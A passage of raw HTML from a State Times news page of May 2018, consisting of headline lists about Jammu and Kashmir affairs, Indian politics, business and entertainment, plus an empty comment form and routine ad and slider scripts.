			                        <h4><a itemprop="name" href="http://news.statetimes.in/resolutions-in-pak-assemblies-demand-registration-of-treason-case-against-sharif/">Resolutions in Pak assemblies demand registration of treason case against Sharif</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-05-15T16:43:39+00:00">May 15, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/jet-airways-offers-fares-starting-rs-967-for-udan-flights/"><img src="http://news.statetimes.in/wp-content/uploads/2018/01/Jet-Airways-terminates-two-pilots-involved-in-mid-air-brawl-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/01/Jet-Airways-terminates-two-pilots-involved-in-mid-air-brawl.jpg" alt="Jet Airways offers fares starting Rs 967 for Udan flights"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/jet-airways-offers-fares-starting-rs-967-for-udan-flights/">Jet Airways offers fares starting Rs 967 for Udan flights</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-05-15T16:43:26+00:00">May 15, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/yoga-teacher-accident-case-solved-driver-arrested-truck-seized/"><img src="http://news.statetimes.in/wp-content/uploads/2018/05/2-1-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/05/2-1-610x380.jpg" alt="Yoga teacher accident case solved; driver arrested, truck seized  "></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/yoga-teacher-accident-case-solved-driver-arrested-truck-seized/">Yoga teacher accident case solved; driver arrested, truck seized  </a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-05-15T16:38:12+00:00">May 15, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/cong-decides-to-back-jds-in-forming-govt/"><img src="http://news.statetimes.in/wp-content/uploads/2017/07/Congress-shifts-44-Gujarat-MLAs-to-Bengaluru-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2017/07/Congress-shifts-44-Gujarat-MLAs-to-Bengaluru.jpg" alt="Cong decides to back JD(S) in forming govt"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/cong-decides-to-back-jds-in-forming-govt/">Cong decides to back JD(S) in forming govt</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-05-15T16:00:56+00:00">May 15, 2018</time>
			</div>
                </li>

</ul>
</div>

<div id="comments" class="comments-area">

	
		
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/policeman-martyred-in-terrorist-attack-in-anantnag/#respond" style="display:none;">Cancel Reply</a></small></h3>			<form action="http://news.statetimes.in/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><textarea id="comment" placeholder="Comment..." name="comment" cols="45" rows="8" aria-required="true"></textarea></p><input id="author" name="author" type="text" placeholder="Name (required)" value="" size="30" aria-required='true' />
<input id="email" name="email" type="text" placeholder="Email (required)" value="" size="30" aria-required='true' />
<input id="url" name="url" type="text" placeholder="Website" value="" size="30" />
<p class="form-submit"><input name="submit" type="submit" id="submit-comment" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='359207' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="8914a3758a" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="210"/></p>			</form>
			</div><!-- #respond -->
	
</div><!-- #comments .comments-area -->
            </div> <!--main column-->
                      <div class="sidebar secondary-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-posts_list"><div class="widget-head"><h3 class="widget-title"><span>Latest News</span></h3></div>		<ul>
		
			<li><a href="http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/">Policeman martyred in terrorist attack in Anantnag</a></li>

			
			<li><a href="http://news.statetimes.in/separtists-to-protest-pms-visit-to-j-k/">Separtists to protest PM&#8217;s visit to J-K</a></li>

			
			<li><a href="http://news.statetimes.in/solar-scam-hc-partly-allows-chandys-plea-challenging-legality-of-commission-report/">Solar scam: HC partly allows Chandy&#8217;s plea, challenging legality of commission report</a></li>

			
			<li><a href="http://news.statetimes.in/resolutions-in-pak-assemblies-demand-registration-of-treason-case-against-sharif/">Resolutions in Pak assemblies demand registration of treason case against Sharif</a></li>

			
			<li><a href="http://news.statetimes.in/jet-airways-offers-fares-starting-rs-967-for-udan-flights/">Jet Airways offers fares starting Rs 967 for Udan flights</a></li>

			
			<li><a href="http://news.statetimes.in/yoga-teacher-accident-case-solved-driver-arrested-truck-seized/">Yoga teacher accident case solved; driver arrested, truck seized  </a></li>

			
			<li><a href="http://news.statetimes.in/cong-decides-to-back-jds-in-forming-govt/">Cong decides to back JD(S) in forming govt</a></li>

			
			<li><a href="http://news.statetimes.in/sensex-slips-59-pts-on-cong-jds-alliance-buzz-in-ktaka/">Sensex slips 59 pts on Cong-JD(S) alliance buzz in K&#8217;taka</a></li>

			
			<li><a href="http://news.statetimes.in/services-sector-can-attract-huge-investment-generate-jobs-kovind/">Services sector can attract huge investment, generate jobs: Kovind</a></li>

			
			<li><a href="http://news.statetimes.in/over-300000-workers-to-be-employed-in-solar-wind-energy-sectors-in-india-report/">Over 300,000 workers to be employed in solar, wind energy sectors in India: report</a></li>

			
			<li><a href="http://news.statetimes.in/karnataka-results-show-what-will-happen-in-2019-polls-danve/">Karnataka results show what will happen in 2019 polls: Danve</a></li>

			
			<li><a href="http://news.statetimes.in/9-11-and-y2k-brought-india-us-together-in-post-cold-war-era-sarna/">9/11 and Y2k brought India, US together in post-Cold War era : Sarna</a></li>

			
			<li><a href="http://news.statetimes.in/gold-shines-on-jewellers-buying/">Gold shines on jewellers&#8217; buying</a></li>

			
			<li><a href="http://news.statetimes.in/aadhaar-not-mandatory-for-getting-pension-govt/">Aadhaar not mandatory for getting pension: Govt</a></li>

			
			<li><a href="http://news.statetimes.in/kashmir-division-and-winter-zone-schools-of-jammu-division-to-observe-timing-from-900am-to-300pm/">Kashmir Division and winter zone schools of Jammu Division to observe timing from 9:00AM to 3:00PM</a></li>

											</ul>
</div>
            </div> <!--main sidebar-->
            <div class="clear"></div>
            <div class="clear"></div>
</div> <!--main container-->            
            <div class="sidebar main-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-ads">		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="4677" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- sidebar one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:250px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="5446915816"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
</div><div class="widget widget_momizattabber">                        <div class="main_tabs">
                            <ul class="tabs"></ul>
                            <div class="tabs-content-wrap">
                                <div class="tab-content"><a href="#" class="mom-tw-title">Top Stories</a>                                   <div class="mom-posts-widget">

					<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/with-no-consensus-on-contenders-vyas-may-continue-as-cs-for-6-more-months/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="With no consensus on contenders, Vyas may continue as CS for 6 more months" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/with-no-consensus-on-contenders-vyas-may-continue-as-cs-for-6-more-months/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="With no consensus on contenders, Vyas may continue as CS for 6 more months" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/with-no-consensus-on-contenders-vyas-may-continue-as-cs-for-6-more-months/">With no consensus on contenders, Vyas may continue as CS for 6 more months</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-05-15T01:17:59+00:00" class="entry-date">May 15, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/art-35a-interlocutor-discussing-issues-to-jk-residents-centre/"><img src="https://news.statetimes.in/wp-content/uploads/2018/05/Dineshwar-1-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2018/05/Dineshwar-1-90x60.jpg" alt="Art 35A: Interlocutor discussing issues to J&K residents: Centre" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/art-35a-interlocutor-discussing-issues-to-jk-residents-centre/"><img src="https://news.statetimes.in/wp-content/uploads/2018/05/Dineshwar-1-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2018/05/Dineshwar-1-180x120.jpg" alt="Art 35A: Interlocutor discussing issues to J&K residents: Centre" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/art-35a-interlocutor-discussing-issues-to-jk-residents-centre/">Art 35A: Interlocutor discussing issues to J&#038;K residents: Centre</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-05-15T01:17:35+00:00" class="entry-date">May 15, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/3-ias-officers-transferred-samoon-fc-revenue/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="3 IAS officers transferred; Samoon FC Revenue" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/3-ias-officers-transferred-samoon-fc-revenue/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="3 IAS officers transferred; Samoon FC Revenue" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/3-ias-officers-transferred-samoon-fc-revenue/">3 IAS officers transferred; Samoon FC Revenue</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-05-15T01:16:36+00:00" class="entry-date">May 15, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/mehbooba-reviews-ramazan-arrangements-asks-administration-to-remain-alert/"><img src="https://news.statetimes.in/wp-content/uploads/2018/05/CM-reviews-Ramadhan-arrangements-14-Copy-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2018/05/CM-reviews-Ramadhan-arrangements-14-Copy-90x60.jpg" alt="Mehbooba reviews Ramazan arrangements; asks administration to remain alert" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/mehbooba-reviews-ramazan-arrangements-asks-administration-to-remain-alert/"><img src="https://news.statetimes.in/wp-content/uploads/2018/05/CM-reviews-Ramadhan-arrangements-14-Copy-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2018/05/CM-reviews-Ramadhan-arrangements-14-Copy-180x120.jpg" alt="Mehbooba reviews Ramazan arrangements; asks administration to remain alert" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/mehbooba-reviews-ramazan-arrangements-asks-administration-to-remain-alert/">Mehbooba reviews Ramazan arrangements; asks administration to remain alert</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-05-15T01:16:23+00:00" class="entry-date">May 15, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/kupwara-terror-attack-case-nia-court-grants-25-day-judicial-remand-of-pak-terrorist/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Kupwara terror attack case: NIA Court grants 25-day judicial remand of Pak terrorist" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/kupwara-terror-attack-case-nia-court-grants-25-day-judicial-remand-of-pak-terrorist/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Kupwara terror attack case: NIA Court grants 25-day judicial remand of Pak terrorist" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/kupwara-terror-attack-case-nia-court-grants-25-day-judicial-remand-of-pak-terrorist/">Kupwara terror attack case: NIA Court grants 25-day judicial remand of Pak terrorist</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-05-15T01:16:18+00:00" class="entry-date">May 15, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/centre-a-mute-spectator-to-situation-in-kashmir-farooq/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Centre a mute spectator to situation in Kashmir: Farooq" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/centre-a-mute-spectator-to-situation-in-kashmir-farooq/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Centre a mute spectator to situation in Kashmir: Farooq" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/centre-a-mute-spectator-to-situation-in-kashmir-farooq/">Centre a mute spectator to situation in Kashmir: Farooq</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-05-15T01:15:51+00:00" class="entry-date">May 15, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/sc-to-hear-kathua-witnesses-plea-alleging-police-harassment-on-may-16/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="SC to hear Kathua witnesses plea alleging police  harassment on May 16" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/sc-to-hear-kathua-witnesses-plea-alleging-police-harassment-on-may-16/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="SC to hear Kathua witnesses plea alleging police  harassment on May 16" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/sc-to-hear-kathua-witnesses-plea-alleging-police-harassment-on-may-16/">SC to hear Kathua witnesses plea alleging police  harassment on May 16</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-05-15T01:15:38+00:00" class="entry-date">May 15, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/tasleem-is-new-addl-sessions-judge-anticorruption-jmu/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Tasleem is new Addl Sessions Judge Anticorruption Jmu" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/tasleem-is-new-addl-sessions-judge-anticorruption-jmu/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Tasleem is new Addl Sessions Judge Anticorruption Jmu" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/tasleem-is-new-addl-sessions-judge-anticorruption-jmu/">Tasleem is new Addl Sessions Judge Anticorruption Jmu</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-05-15T01:15:19+00:00" class="entry-date">May 15, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/sunanda-pushkar-case-charge-sheet-names-tharoor-as-accused/"><img src="https://news.statetimes.in/wp-content/uploads/2018/05/SHASHI_4465-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2018/05/SHASHI_4465-90x60.jpg" alt="Sunanda Pushkar case: Charge sheet names Tharoor as accused" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/sunanda-pushkar-case-charge-sheet-names-tharoor-as-accused/"><img src="https://news.statetimes.in/wp-content/uploads/2018/05/SHASHI_4465-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2018/05/SHASHI_4465-180x120.jpg" alt="Sunanda Pushkar case: Charge sheet names Tharoor as accused" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/sunanda-pushkar-case-charge-sheet-names-tharoor-as-accused/">Sunanda Pushkar case: Charge sheet names Tharoor as accused</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-05-15T01:14:51+00:00" class="entry-date">May 15, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/pm-reshuffles-cabinet-piyush-gets-finance-rathore-replaces-smriti-as-ib-minister/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="PM reshuffles cabinet: Piyush gets finance; Rathore replaces Smriti as I&B minister" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/pm-reshuffles-cabinet-piyush-gets-finance-rathore-replaces-smriti-as-ib-minister/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="PM reshuffles cabinet: Piyush gets finance; Rathore replaces Smriti as I&B minister" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/pm-reshuffles-cabinet-piyush-gets-finance-rathore-replaces-smriti-as-ib-minister/">PM reshuffles cabinet: Piyush gets finance; Rathore replaces Smriti as I&#038;B minister</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-05-15T01:13:53+00:00" class="entry-date">May 15, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/six-teachers-injured-in-police-baton-charge/"><img src="https://news.statetimes.in/wp-content/uploads/2018/05/ReT-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2018/05/ReT-90x60.jpg" alt="Six teachers injured in police baton-charge" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/six-teachers-injured-in-police-baton-charge/"><img src="https://news.statetimes.in/wp-content/uploads/2018/05/ReT-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2018/05/ReT-180x120.jpg" alt="Six teachers injured in police baton-charge" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/six-teachers-injured-in-police-baton-charge/">Six teachers injured in police baton-charge</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-05-15T01:13:33+00:00" class="entry-date">May 15, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/mehbooba-govt-revokes-order-that-sought-details-of-kashmiri-pandits-visiting-kheer-bhawani-temple/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Govt revokes order seeking details of KPs visiting Kheer Bhawani" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/mehbooba-govt-revokes-order-that-sought-details-of-kashmiri-pandits-visiting-kheer-bhawani-temple/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Govt revokes order seeking details of KPs visiting Kheer Bhawani" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/mehbooba-govt-revokes-order-that-sought-details-of-kashmiri-pandits-visiting-kheer-bhawani-temple/">Govt revokes order seeking details of KPs visiting Kheer Bhawani</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-05-14T17:25:09+00:00" class="entry-date">May 14, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/suspected-movement-along-ib-high-alert-sounded-in-jammu/"><img src="https://news.statetimes.in/wp-content/uploads/2018/05/DSC_0011-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2018/05/DSC_0011-90x60.jpg" alt="Suspected movement along IB, high alert sounded in Jammu" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/suspected-movement-along-ib-high-alert-sounded-in-jammu/"><img src="https://news.statetimes.in/wp-content/uploads/2018/05/DSC_0011-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2018/05/DSC_0011-180x120.jpg" alt="Suspected movement along IB, high alert sounded in Jammu" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/suspected-movement-along-ib-high-alert-sounded-in-jammu/">Suspected movement along IB, high alert sounded in Jammu</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-05-14T13:22:19+00:00" class="entry-date">May 14, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

									                                    </div>
</div><div class="tab-content"><a href="#" class="mom-tw-title">Cities n Towns</a>		<ul>
		
			<li><a href="http://news.statetimes.in/yoga-teacher-accident-case-solved-driver-arrested-truck-seized/">Yoga teacher accident case solved; driver arrested, truck seized  </a></li>

			
			<li><a href="http://news.statetimes.in/breaking-news-five-pakistani-terrorists-have-entered-though-some-tunnel-in-hiranagar-sector/">BREAKING NEWS: Five Pakistani terrorists have entered though some tunnel in Hiranagar sector</a></li>

			
			<li><a href="http://news.statetimes.in/bsf-jawan-martyred-as-pakistan-violates-ceasefire-along-ib-in-jammu/">BSF jawan martyred as Pakistan violates ceasefire along IB in Jammu</a></li>

			
			<li><a href="http://news.statetimes.in/sunil-inaugurates-upgraded-receiving-stations/">Sunil inaugurates upgraded receiving stations</a></li>

			
			<li><a href="http://news.statetimes.in/sat-rajesh-review-ongoing-work-of-multi-storey-parking/">Sat, Rajesh review ongoing work of multi-storey parking</a></li>

			
			<li><a href="http://news.statetimes.in/cec-for-promoting-yak-rearing-in-leh-district/">CEC for promoting yak rearing in Leh district</a></li>

			
			<li><a href="http://news.statetimes.in/rajesh-distributes-free-lpg-connections/">Rajesh distributes free LPG connections</a></li>

			
			<li><a href="http://news.statetimes.in/police-solves-murder-case-three-arrested/">Police solves murder case; three arrested</a></li>

			
			<li><a href="http://news.statetimes.in/ek-sath-rang-mandal-presents-hamarey-sanskar/">Ek Sath Rang Mandal presents Hamarey Sanskar</a></li>

			
			<li><a href="http://news.statetimes.in/students-life-at-risk-as-school-buildings-unsafe/">Students’ life at risk as school buildings ‘unsafe’</a></li>

			
			<li><a href="http://news.statetimes.in/former-minister-ch-lal-singh-briefing-media-persons-at-gandhi-nagar-jammu/">Lal Singh cries conspiracy against people of Jammu, reiterates CBI probe in Kathua case</a></li>

			
			<li><a href="http://news.statetimes.in/power-shutdown-scheduled-in-parts-of-jammu-44/">Power shutdown scheduled in parts of Jammu</a></li>

			
			<li><a href="http://news.statetimes.in/bjp-celebrates-rainas-appointment-as-party-head/">BJP celebrates Raina’s appointment as party head</a></li>

			
			<li><a href="http://news.statetimes.in/rs-121-cr-district-plan-for-ramban-approved/">Rs 121 cr district plan for Ramban approved</a></li>

			
			<li><a href="http://news.statetimes.in/upgradation-of-hs-darhal-demanded/">Upgradation of HS Darhal demanded</a></li>

			
			<li><a href="http://news.statetimes.in/moungri-mela-commences/">Moungri Mela commences</a></li>

											</ul>
</div>                            </div>
                        </div> <!--main tabs-->

            </div><div class="widget momizat-posts_slider"><div class="widget-head"><h3 class="widget-title"><span>Entertainment n Lifestyle</span></h3></div>			<script>
			jQuery(document).ready(function ($) {
				jQuery('.mpsw-slider').flexslider({
					animation : 'slide',
					controlNav: false,
					smoothHeight: true,
					prevText: '',
					nextText: '',
					slideshow: 1,
					slideshowSpeed: 4000,
				});
			});
			</script>
			<div class="mom-posts-slide-widget type-">
                            <div class="mpsw-slider">
                              <ul class="slides">
											<li>
			<a href="http://news.statetimes.in/priyanka-chopras-next-marathi-production-titled-paani/"><img src="http://news.statetimes.in/wp-content/uploads/2016/03/Priyanka-Chopra-reaches-13-million-Twitter-followers-240x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/03/Priyanka-Chopra-reaches-13-million-Twitter-followers-240x168.jpg" alt="Priyanka Chopra's next Marathi production titled 'Paani'" width="265" height="168">			  <p class="slide-caption">Priyanka Chopra&#8217;s next Marathi production titled &#8216;Paani&#8217;</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/emilia-clarke-backs-kit-harington-to-play-luke-skywalker/"><img src="http://news.statetimes.in/wp-content/uploads/2018/05/Emilia-Clarke-backs-Kit-Harington-to-play-Luke-Skywalker-265x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/05/Emilia-Clarke-backs-Kit-Harington-to-play-Luke-Skywalker-265x168.jpg" alt="Emilia Clarke backs Kit Harington to play Luke Skywalker" width="265" height="168">			  <p class="slide-caption">Emilia Clarke backs Kit Harington to play Luke Skywalker</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/vaani-kapoor-to-star-opposite-ranbir-in-shamshera/"><img src="http://news.statetimes.in/wp-content/uploads/2018/05/Vaani-Kapoor-to-star-opposite-Ranbir-in-Shamshera-265x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/05/Vaani-Kapoor-to-star-opposite-Ranbir-in-Shamshera-265x168.jpg" alt="Vaani Kapoor to star opposite Ranbir in 'Shamshera'" width="265" height="168">			  <p class="slide-caption">Vaani Kapoor to star opposite Ranbir in &#8216;Shamshera&#8217;</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/lata-mangeshkar-conferred-with-swara-mauli-award/"><img src="http://news.statetimes.in/wp-content/uploads/2016/09/Lata-Mangeshkar-gives-blessings-to-Asha-Bhosle-on-birthday-265x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/09/Lata-Mangeshkar-gives-blessings-to-Asha-Bhosle-on-birthday-265x168.jpg" alt="Lata Mangeshkar conferred with Swara Mauli award" width="265" height="168">			  <p class="slide-caption">Lata Mangeshkar conferred with Swara Mauli award</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/astrology-weekly-predictions-13th-19th-may-2018/"><img src="http://news.statetimes.in/wp-content/uploads/2017/03/Horoscope-circle-Stock-Vector-zodiac-horoscope-astrology-265x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2017/03/Horoscope-circle-Stock-Vector-zodiac-horoscope-astrology-265x168.jpg" alt="ASTROLOGY: Weekly predictions 13th – 19th  may 2018" width="265" height="168">			  <p class="slide-caption">ASTROLOGY: Weekly predictions 13th – 19th  may 2018</p>
